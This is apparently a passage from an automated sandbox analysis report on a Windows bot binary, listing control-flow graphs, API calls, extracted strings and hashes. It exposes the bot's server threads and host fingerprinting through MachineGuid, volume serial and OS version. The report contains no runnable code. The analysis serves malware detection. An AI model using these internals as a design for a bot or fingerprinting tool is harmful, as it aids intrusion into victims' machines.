                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                    • API String ID: 2897271634-4162578512
                    • Opcode ID: 066b0039191f1d6ba5b6da45dd2910b987306dccb441d82a47b06479b931fc89
                    • Instruction ID: fa43901f16ce714c0e4427f22b3a29f5259df7e81dc25cd4f965efcb50240fe6
                    • Opcode Fuzzy Hash: 066b0039191f1d6ba5b6da45dd2910b987306dccb441d82a47b06479b931fc89
                    • Instruction Fuzzy Hash: D9D16F62A29A0381FA20FB15ED40FB8E761AF54794FD54032C94E472E5DF3CE5A9C328
                    Function 00007FF8BFAB6941 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 327threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 85 7ff8bfab6941-7ff8bfab6964 InitializeCriticalSectionAndSpinCount 86 7ff8bfab696a-7ff8bfab6991 InitializeCriticalSectionAndSpinCount 85->86 87 7ff8bfab6aec-7ff8bfab6b0d GetLastError call 7ff8bfaba202 85->87 88 7ff8bfab6997-7ff8bfab69a7 86->88 89 7ff8bfab6c08-7ff8bfab6c29 GetLastError call 7ff8bfaba202 86->89 97 7ff8bfab6b27-7ff8bfab6b2d 87->97 98 7ff8bfab6b0f 87->98 91 7ff8bfab6fda-7ff8bfab6ff2 call 7ff8bfaba202 88->91 92 7ff8bfab69ad-7ff8bfab69e5 CreateThread 88->92 107 7ff8bfab6c43-7ff8bfab6c49 89->107 108 7ff8bfab6c2b 89->108 106 7ff8bfab6ff7-7ff8bfab6ffe 91->106 95 7ff8bfab6ce0-7ff8bfab6d01 GetLastError call 7ff8bfaba202 92->95 96 7ff8bfab69eb-7ff8bfab6a07 call 7ff8bfaba202 92->96 119 7ff8bfab6d03 95->119 120 7ff8bfab6d17-7ff8bfab6d1d 95->120 96->91 125 7ff8bfab6a0d-7ff8bfab6a45 CreateThread 96->125 104 7ff8bfab6b33-7ff8bfab6b39 97->104 105 7ff8bfab6bcc 97->105 102 7ff8bfab6b15-7ff8bfab6b22 98->102 103 7ff8bfab6bb8 98->103 102->97 103->105 114 7ff8bfab6b65-7ff8bfab6b68 104->114 115 7ff8bfab6b3b-7ff8bfab6b41 104->115 118 7ff8bfab6bd6 105->118 111 7ff8bfab6fff-7ff8bfab7004 107->111 112 7ff8bfab6c4f-7ff8bfab6c55 107->112 116 7ff8bfab6c31-7ff8bfab6c3e 108->116 117 7ff8bfab6fd5 108->117 111->91 121 7ff8bfab6c81-7ff8bfab6c84 112->121 122 7ff8bfab6c57-7ff8bfab6c5d 112->122 123 7ff8bfab6b6a-7ff8bfab6b6d 114->123 124 7ff8bfab6b7e-7ff8bfab6b84 114->124 126 7ff8bfab6b47-7ff8bfab6b4d 115->126 127 7ff8bfab6bf4 115->127 116->107 117->91 148 7ff8bfab6be0 118->148 130 7ff8bfab6d05-7ff8bfab6d12 119->130 131 7ff8bfab6d7a-7ff8bfab6d8a 119->131 134 7ff8bfab6d1f 120->134 135 7ff8bfab6d4d-7ff8bfab6d5d 120->135 137 7ff8bfab6ca2-7ff8bfab6ca8 121->137 138 7ff8bfab6c86-7ff8bfab6c89 121->138 132 7ff8bfab6c63-7ff8bfab6c69 122->132 133 7ff8bfab701b-7ff8bfab7020 122->133 123->118 136 7ff8bfab6b6f-7ff8bfab6b72 123->136 139 7ff8bfab6b86 124->139 140 7ff8bfab6bea 124->140 141 7ff8bfab6a4b-7ff8bfab6a67 call 7ff8bfaba202 125->141 142 7ff8bfab6de8-7ff8bfab6e09 GetLastError call 7ff8bfaba202 125->142 128 7ff8bfab6b53-7ff8bfab6b59 126->128 129 7ff8bfab6bfe 126->129 127->129 143 7ff8bfab6b90 128->143 144 7ff8bfab6b5b 128->144 129->89 130->120 131->91 146 7ff8bfab7022-7ff8bfab7027 132->146 147 7ff8bfab6c6f-7ff8bfab6c75 132->147 133->91 155 7ff8bfab6d62-7ff8bfab6d68 134->155 156 7ff8bfab6d21-7ff8bfab6d24 134->156 135->91 136->148 149 7ff8bfab6b74 136->149 152 7ff8bfab7014-7ff8bfab7019 137->152 153 7ff8bfab6cae-7ff8bfab6cb3 137->153 150 7ff8bfab7006-7ff8bfab700b 138->150 151 7ff8bfab6c8f-7ff8bfab6c92 138->151 139->143 140->127 141->91 169 7ff8bfab6a6d-7ff8bfab6aa5 CreateThread 141->169 167 7ff8bfab6e0b 142->167 168 7ff8bfab6e1f-7ff8bfab6e25 142->168 143->103 144->114 146->91 158 7ff8bfab6c77-7ff8bfab6c7c 147->158 159 7ff8bfab6cb8-7ff8bfab6cbd 147->159 148->140 149->124 150->91 160 7ff8bfab6c98-7ff8bfab6c9d 151->160 161 7ff8bfab700d-7ff8bfab7012 151->161 152->91 153->91 165 7ff8bfab6d30-7ff8bfab6d40 155->165 166 7ff8bfab6d6a-7ff8bfab6d70 155->166 163 7ff8bfab6d26-7ff8bfab6d29 156->163 164 7ff8bfab6d45-7ff8bfab6d4b 156->164 158->91 159->91 160->91 161->91 170 7ff8bfab6da4-7ff8bfab6db4 163->170 171 7ff8bfab6d2b-7ff8bfab6d2e 163->171 164->131 164->135 165->91 172 7ff8bfab6d72-7ff8bfab6d78 166->172 173 7ff8bfab6d8f-7ff8bfab6d9f 166->173 174 7ff8bfab6e82-7ff8bfab6e92 167->174 175 7ff8bfab6e0d-7ff8bfab6e1a 167->175 176 7ff8bfab6e27 168->176 177 7ff8bfab6e55-7ff8bfab6e65 168->177 178 7ff8bfab6ee6-7ff8bfab6f07 GetLastError call 7ff8bfaba202 169->178 179 7ff8bfab6aab-7ff8bfab6ac7 call 7ff8bfaba202 169->179 170->91 171->131 171->165 172->131 172->135 173->91 174->91 175->168 180 7ff8bfab6e6a-7ff8bfab6e70 176->180 181 7ff8bfab6e29-7ff8bfab6e2c 176->181 177->91 195 7ff8bfab6f09 178->195 196 7ff8bfab6f1d-7ff8bfab6f23 178->196 179->91 194 7ff8bfab6acd-7ff8bfab6ae2 call 7ff8bfaba202 179->194 186 7ff8bfab6e72-7ff8bfab6e78 180->186 187 7ff8bfab6e38-7ff8bfab6e48 180->187 184 7ff8bfab6e2e-7ff8bfab6e31 181->184 185 7ff8bfab6e4d-7ff8bfab6e53 181->185 190 7ff8bfab6e33-7ff8bfab6e36 184->190 191 7ff8bfab6eac-7ff8bfab6ebc 184->191 185->174 185->177 192 7ff8bfab6e97-7ff8bfab6ea7 186->192 193 7ff8bfab6e7a-7ff8bfab6e80 186->193 187->91 190->174 190->187 191->91 192->91 193->174 193->177 202 7ff8bfab6ae7 194->202 198 7ff8bfab6f0b-7ff8bfab6f18 195->198 199 7ff8bfab6f3f-7ff8bfab6f4f 195->199 200 7ff8bfab6f25 196->200 201 7ff8bfab6f7d-7ff8bfab6f8d 196->201 198->196 199->91 203 7ff8bfab6f27-7ff8bfab6f2d 200->203 204 7ff8bfab6f54-7ff8bfab6f57 200->204 201->91 202->106 207 7ff8bfab6f63-7ff8bfab6f73 203->207 208 7ff8bfab6f2f-7ff8bfab6f35 203->208 205 7ff8bfab6f75-7ff8bfab6f7b 204->205 206 7ff8bfab6f59-7ff8bfab6f5c 204->206 205->199 205->201 211 7ff8bfab6fa1-7ff8bfab6fb1 206->211 212 7ff8bfab6f5e-7ff8bfab6f61 206->212 207->91 209 7ff8bfab6f37-7ff8bfab6f3d 208->209 210 7ff8bfab6f8f-7ff8bfab6f9f 208->210 209->199 209->201 210->91 211->91 212->199 212->207
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                    • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                    • API String ID: 3214881788-719614687
                    • Opcode ID: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                    • Instruction ID: 316f7cabc6ace3ccd4129ea2dcc53c8324bd2b2dcd8bf77b81e298491aafb6b7
                    • Opcode Fuzzy Hash: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                    • Instruction Fuzzy Hash: 58F1EA20A0CF0785FB285BDCE8963781390AB05BEDF142372D76E063E2DE6DA9859355
                    Function 00007FF8BFB84BC0 Relevance: 58.0, APIs: 11, Strings: 22, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 213 7ff8bfb84bc0-7ff8bfb84bda call 7ff8bfb844a4 216 7ff8bfb850f2 213->216 217 7ff8bfb84be0-7ff8bfb84bf5 call 7ff8bfb84423 213->217 220 7ff8bfb85106-7ff8bfb8510b 216->220 221 7ff8bfb84c4b 217->221 222 7ff8bfb84bf7-7ff8bfb84c25 217->222 223 7ff8bfb84c5d-7ff8bfb84c74 call 7ff8bfb81292 220->223 224 7ff8bfb84c50-7ff8bfb84c5b FreeLibrary 221->224 229 7ff8bfb84c2e-7ff8bfb84c49 call 7ff8bfb81292 222->229 230 7ff8bfb84c27-7ff8bfb84c2c 222->230 228 7ff8bfb84c79-7ff8bfb84c86 223->228 224->223 227 7ff8bfb84c87-7ff8bfb84cc0 GetNativeSystemInfo GetWindowsDirectoryA 224->227 231 7ff8bfb84d9e-7ff8bfb84dc1 call 7ff8bfb81292 227->231 232 7ff8bfb84cc6-7ff8bfb84ce7 GetLastError call 7ff8bfb81292 227->232 229->224 230->224 231->223 241 7ff8bfb84dc7-7ff8bfb84dfd call 7ff8bfb8d6c2 231->241 239 7ff8bfb84ce9 232->239 240 7ff8bfb84d07-7ff8bfb84d0d 232->240 242 7ff8bfb84cfd-7ff8bfb84d02 239->242 243 7ff8bfb84ceb-7ff8bfb84cf8 239->243 240->220 245 7ff8bfb84d13-7ff8bfb84d19 240->245 249 7ff8bfb84eae-7ff8bfb84eca call 7ff8bfb81292 241->249 250 7ff8bfb84e03-7ff8bfb84e05 241->250 242->223 243->242 247 7ff8bfb84d1b-7ff8bfb84d1e 245->247 248 7ff8bfb84d52-7ff8bfb84d58 245->248 251 7ff8bfb84d3c-7ff8bfb84d42 247->251 252 7ff8bfb84d20-7ff8bfb84d23 247->252 253 7ff8bfb8512e-7ff8bfb85133 248->253 254 7ff8bfb84d5e-7ff8bfb84d64 248->254 265 7ff8bfb84ecf 249->265 250->223 256 7ff8bfb84e0b-7ff8bfb84e68 GetVolumeInformationA 250->256 259 7ff8bfb84d48-7ff8bfb84d4d 251->259 260 7ff8bfb85124-7ff8bfb85129 251->260 257 7ff8bfb84d29-7ff8bfb84d2c 252->257 258 7ff8bfb85110-7ff8bfb85115 252->258 253->223 261 7ff8bfb84d6a-7ff8bfb84d70 254->261 262 7ff8bfb85138-7ff8bfb8513d 254->262 266 7ff8bfb84e6e-7ff8bfb84e94 GetLastError call 7ff8bfb81292 256->266 267 7ff8bfb84f6b-7ff8bfb84f9d call 7ff8bfb81292 256->267 268 7ff8bfb8511a-7ff8bfb8511f 257->268 269 7ff8bfb84d32-7ff8bfb84d37 257->269 258->223 259->223 260->223 263 7ff8bfb84d76-7ff8bfb84d7b 261->263 264 7ff8bfb85142-7ff8bfb85147 261->264 262->223 263->223 264->223 265->250 276 7ff8bfb84e96 266->276 277 7ff8bfb84ed4-7ff8bfb84eda 266->277 274 7ff8bfb84f9f-7ff8bfb84fab strlen 267->274 275 7ff8bfb84fb1-7ff8bfb84fb8 267->275 268->223 269->223 274->275 278 7ff8bfb85073-7ff8bfb85077 274->278 281 7ff8bfb84fbc-7ff8bfb85019 call 7ff8bfb81292 275->281 282 7ff8bfb84e9c-7ff8bfb84ea9 276->282 283 7ff8bfb85023-7ff8bfb85028 276->283 279 7ff8bfb85037-7ff8bfb8503c 277->279 280 7ff8bfb84ee0 277->280 278->275 287 7ff8bfb8507d-7ff8bfb85081 278->287 279->223 284 7ff8bfb84f19-7ff8bfb84f1f 280->284 285 7ff8bfb84ee2-7ff8bfb84ee5 280->285 291 7ff8bfb8501e 281->291 282->249 283->223 292 7ff8bfb8505f-7ff8bfb85064 284->292 293 7ff8bfb84f25-7ff8bfb84f2b 284->293 289 7ff8bfb84ee7-7ff8bfb84eea 285->289 290 7ff8bfb84f03-7ff8bfb84f09 285->290 287->275 288 7ff8bfb85087-7ff8bfb850ba _errno strtol _errno 287->288 294 7ff8bfb850bc-7ff8bfb850bf 288->294 295 7ff8bfb850ca-7ff8bfb850ed _errno call 7ff8bfb81292 288->295 296 7ff8bfb85041-7ff8bfb85046 289->296 297 7ff8bfb84ef0-7ff8bfb84ef3 289->297 298 7ff8bfb84f0f-7ff8bfb84f14 290->298 299 7ff8bfb85055-7ff8bfb8505a 290->299 291->228 292->223 300 7ff8bfb85069-7ff8bfb8506e 293->300 301 7ff8bfb84f31-7ff8bfb84f37 293->301 294->281 302 7ff8bfb850c5 294->302 295->275 296->223 304 7ff8bfb8504b-7ff8bfb85050 297->304 305 7ff8bfb84ef9-7ff8bfb84efe 297->305 298->223 299->223 300->223 306 7ff8bfb84f39-7ff8bfb84f3e 301->306 307 7ff8bfb84f43-7ff8bfb84f48 301->307 302->275 304->223 305->223 306->223 307->223
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                    • Instruction ID: 496679b481f52713cffa1383241b7b3b0ca25ccd83f21ba4c5202b7748923bf6
                    • Opcode Fuzzy Hash: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                    • Instruction Fuzzy Hash: 0FD1A021E0C657C1FB249B9CE4807B867A0AF857D8F559037CB5E476A6DE2CEC84C781
                    Function 00007FF8BFB54430 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 701 7ff8bfb54430-7ff8bfb5444a call 7ff8bfb52174 704 7ff8bfb54450-7ff8bfb54465 call 7ff8bfb520f3 701->704 705 7ff8bfb54962 701->705 710 7ff8bfb544bb 704->710 711 7ff8bfb54467-7ff8bfb54495 704->711 707 7ff8bfb54976-7ff8bfb5497b 705->707 709 7ff8bfb544cd-7ff8bfb544e4 call 7ff8bfb52fd2 707->709 715 7ff8bfb544e9-7ff8bfb544f6 709->715 712 7ff8bfb544c0-7ff8bfb544cb FreeLibrary 710->712 719 7ff8bfb5449e-7ff8bfb544b9 call 7ff8bfb52fd2 711->719 720 7ff8bfb54497-7ff8bfb5449c 711->720 712->709 714 7ff8bfb544f7-7ff8bfb54530 GetNativeSystemInfo GetWindowsDirectoryA 712->714 717 7ff8bfb5460e-7ff8bfb54631 call 7ff8bfb52fd2 714->717 718 7ff8bfb54536-7ff8bfb54557 GetLastError call 7ff8bfb52fd2 714->718 717->709 729 7ff8bfb54637-7ff8bfb5466d call 7ff8bfb59702 717->729 727 7ff8bfb54559 718->727 728 7ff8bfb54577-7ff8bfb5457d 718->728 719->712 720->712 732 7ff8bfb5456d-7ff8bfb54572 727->732 733 7ff8bfb5455b-7ff8bfb54568 727->733 728->707 731 7ff8bfb54583-7ff8bfb54589 728->731 737 7ff8bfb5471e-7ff8bfb5473a call 7ff8bfb52fd2 729->737 738 7ff8bfb54673-7ff8bfb54675 729->738 735 7ff8bfb5458b-7ff8bfb5458e 731->735 736 7ff8bfb545c2-7ff8bfb545c8 731->736 732->709 733->732 739 7ff8bfb545ac-7ff8bfb545b2 735->739 740 7ff8bfb54590-7ff8bfb54593 735->740 741 7ff8bfb5499e-7ff8bfb549a3 736->741 742 7ff8bfb545ce-7ff8bfb545d4 736->742 757 7ff8bfb5473f 737->757 738->709 743 7ff8bfb5467b-7ff8bfb546d8 GetVolumeInformationA 738->743 746 7ff8bfb545b8-7ff8bfb545bd 739->746 747 7ff8bfb54994-7ff8bfb54999 739->747 744 7ff8bfb54599-7ff8bfb5459c 740->744 745 7ff8bfb54980-7ff8bfb54985 740->745 741->709 748 7ff8bfb549a8-7ff8bfb549ad 742->748 749 7ff8bfb545da-7ff8bfb545e0 742->749 751 7ff8bfb546de-7ff8bfb54704 GetLastError call 7ff8bfb52fd2 743->751 752 7ff8bfb547db-7ff8bfb5480d call 7ff8bfb52fd2 743->752 753 7ff8bfb5498a-7ff8bfb5498f 744->753 754 7ff8bfb545a2-7ff8bfb545a7 744->754 745->709 746->709 747->709 748->709 755 7ff8bfb545e6-7ff8bfb545eb 749->755 756 7ff8bfb549b2-7ff8bfb549b7 749->756 762 7ff8bfb54744-7ff8bfb5474a 751->762 763 7ff8bfb54706 751->763 764 7ff8bfb5480f-7ff8bfb5481b strlen 752->764 765 7ff8bfb54821-7ff8bfb54828 752->765 753->709 754->709 755->709 756->709 757->738 768 7ff8bfb548a7-7ff8bfb548ac 762->768 769 7ff8bfb54750 762->769 766 7ff8bfb5470c-7ff8bfb54719 763->766 767 7ff8bfb54893-7ff8bfb54898 763->767 764->765 770 7ff8bfb548e3-7ff8bfb548e7 764->770 771 7ff8bfb5482c-7ff8bfb54889 call 7ff8bfb52fd2 765->771 766->737 767->709 768->709 774 7ff8bfb54789-7ff8bfb5478f 769->774 775 7ff8bfb54752-7ff8bfb54755 769->775 770->765 773 7ff8bfb548ed-7ff8bfb548f1 770->773 778 7ff8bfb5488e 771->778 773->765 781 7ff8bfb548f7-7ff8bfb5492a _errno call 7ff8bfb60c38 _errno 773->781 779 7ff8bfb548cf-7ff8bfb548d4 774->779 780 7ff8bfb54795-7ff8bfb5479b 774->780 776 7ff8bfb54757-7ff8bfb5475a 775->776 777 7ff8bfb54773-7ff8bfb54779 775->777 782 7ff8bfb54760-7ff8bfb54763 776->782 783 7ff8bfb548b1-7ff8bfb548b6 776->783 784 7ff8bfb5477f-7ff8bfb54784 777->784 785 7ff8bfb548c5-7ff8bfb548ca 777->785 778->715 779->709 786 7ff8bfb548d9-7ff8bfb548de 780->786 787 7ff8bfb547a1-7ff8bfb547a7 780->787 794 7ff8bfb5492c-7ff8bfb5492f 781->794 795 7ff8bfb5493a-7ff8bfb5495d _errno call 7ff8bfb52fd2 781->795 789 7ff8bfb54769-7ff8bfb5476e 782->789 790 7ff8bfb548bb-7ff8bfb548c0 782->790 783->709 784->709 785->709 786->709 791 7ff8bfb547a9-7ff8bfb547ae 787->791 792 7ff8bfb547b3-7ff8bfb547b8 787->792 789->709 790->709 791->709 792->709 794->771 797 7ff8bfb54935 794->797 795->765 797->765
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                    • API String ID: 3828489143-883582248
                    • Opcode ID: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                    • Instruction ID: 5e24a748ca0a910ce2c7f30d5d750ac1344da967546ca05caaa87a91743d58c4
                    • Opcode Fuzzy Hash: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                    • Instruction Fuzzy Hash: 4BD15B62E0C656D5FA249BDCE4723B9B7A0AF407D8F194132CB4E477A4DE2CF8848781
                    Function 00007FF8B9159770 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 309 7ff8b9159770-7ff8b915978a call 7ff8b915cf94 312 7ff8b9159790-7ff8b91597a5 call 7ff8b915cf13 309->312 313 7ff8b9159ca2 309->313 317 7ff8b91597fb 312->317 318 7ff8b91597a7-7ff8b91597d5 312->318 315 7ff8b9159cb6-7ff8b9159cbb 313->315 319 7ff8b915980d-7ff8b9159824 call 7ff8b9151292 315->319 320 7ff8b9159800-7ff8b915980b FreeLibrary 317->320 325 7ff8b91597de-7ff8b91597f9 call 7ff8b9151292 318->325 326 7ff8b91597d7-7ff8b91597dc 318->326 324 7ff8b9159829-7ff8b9159836 319->324 320->319 323 7ff8b9159837-7ff8b9159870 GetNativeSystemInfo GetWindowsDirectoryA 320->323 327 7ff8b915994e-7ff8b9159971 call 7ff8b9151292 323->327 328 7ff8b9159876-7ff8b9159897 GetLastError call 7ff8b9151292 323->328 325->320 326->320 327->319 337 7ff8b9159977-7ff8b91599ad call 7ff8b915b0e2 327->337 335 7ff8b9159899 328->335 336 7ff8b91598b7-7ff8b91598bd 328->336 338 7ff8b91598ad-7ff8b91598b2 335->338 339 7ff8b915989b-7ff8b91598a8 335->339 336->315 341 7ff8b91598c3-7ff8b91598c9 336->341 345 7ff8b9159a5e-7ff8b9159a7a call 7ff8b9151292 337->345 346 7ff8b91599b3-7ff8b91599b5 337->346 338->319 339->338 343 7ff8b91598cb-7ff8b91598ce 341->343 344 7ff8b9159902-7ff8b9159908 341->344 347 7ff8b91598ec-7ff8b91598f2 343->347 348 7ff8b91598d0-7ff8b91598d3 343->348 349 7ff8b9159cde-7ff8b9159ce3 344->349 350 7ff8b915990e-7ff8b9159914 344->350 359 7ff8b9159a7f 345->359 346->319 351 7ff8b91599bb-7ff8b9159a18 GetVolumeInformationA 346->351 354 7ff8b91598f8-7ff8b91598fd 347->354 355 7ff8b9159cd4-7ff8b9159cd9 347->355 352 7ff8b91598d9-7ff8b91598dc 348->352 353 7ff8b9159cc0-7ff8b9159cc5 348->353 349->319 356 7ff8b9159ce8-7ff8b9159ced 350->356 357 7ff8b915991a-7ff8b9159920 350->357 360 7ff8b9159a1e-7ff8b9159a44 GetLastError call 7ff8b9151292 351->360 361 7ff8b9159b1b-7ff8b9159b4d call 7ff8b9151292 351->361 362 7ff8b9159cca-7ff8b9159ccf 352->362 363 7ff8b91598e2-7ff8b91598e7 352->363 353->319 354->319 355->319 356->319 364 7ff8b9159926-7ff8b915992b 357->364 365 7ff8b9159cf2-7ff8b9159cf7 357->365 359->346 372 7ff8b9159a84-7ff8b9159a8a 360->372 373 7ff8b9159a46 360->373 370 7ff8b9159b4f-7ff8b9159b5b strlen 361->370 371 7ff8b9159b61-7ff8b9159b68 361->371 362->319 363->319 364->319 365->319 370->371 374 7ff8b9159c23-7ff8b9159c27 370->374 377 7ff8b9159b6c-7ff8b9159bc9 call 7ff8b9151292 371->377 375 7ff8b9159be7-7ff8b9159bec 372->375 376 7ff8b9159a90 372->376 378 7ff8b9159a4c-7ff8b9159a59 373->378 379 7ff8b9159bd3-7ff8b9159bd8 373->379 374->371 383 7ff8b9159c2d-7ff8b9159c31 374->383 375->319 380 7ff8b9159ac9-7ff8b9159acf 376->380 381 7ff8b9159a92-7ff8b9159a95 376->381 386 7ff8b9159bce 377->386 378->345 379->319 387 7ff8b9159c0f-7ff8b9159c14 380->387 388 7ff8b9159ad5-7ff8b9159adb 380->388 384 7ff8b9159a97-7ff8b9159a9a 381->384 385 7ff8b9159ab3-7ff8b9159ab9 381->385 383->371 389 7ff8b9159c37-7ff8b9159c6a _errno call 7ff8b9162ab8 _errno 383->389 391 7ff8b9159bf1-7ff8b9159bf6 384->391 392 7ff8b9159aa0-7ff8b9159aa3 384->392 393 7ff8b9159abf-7ff8b9159ac4 385->393 394 7ff8b9159c05-7ff8b9159c0a 385->394 386->324 387->319 395 7ff8b9159c19-7ff8b9159c1e 388->395 396 7ff8b9159ae1-7ff8b9159ae7 388->396 402 7ff8b9159c6c-7ff8b9159c6f 389->402 403 7ff8b9159c7a-7ff8b9159c9d _errno call 7ff8b9151292 389->403 391->319 398 7ff8b9159aa9-7ff8b9159aae 392->398 399 7ff8b9159bfb-7ff8b9159c00 392->399 393->319 394->319 395->319 400 7ff8b9159ae9-7ff8b9159aee 396->400 401 7ff8b9159af3-7ff8b9159af8 396->401 398->319 399->319 400->319 401->319 402->377 404 7ff8b9159c75 402->404 403->371 404->371
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
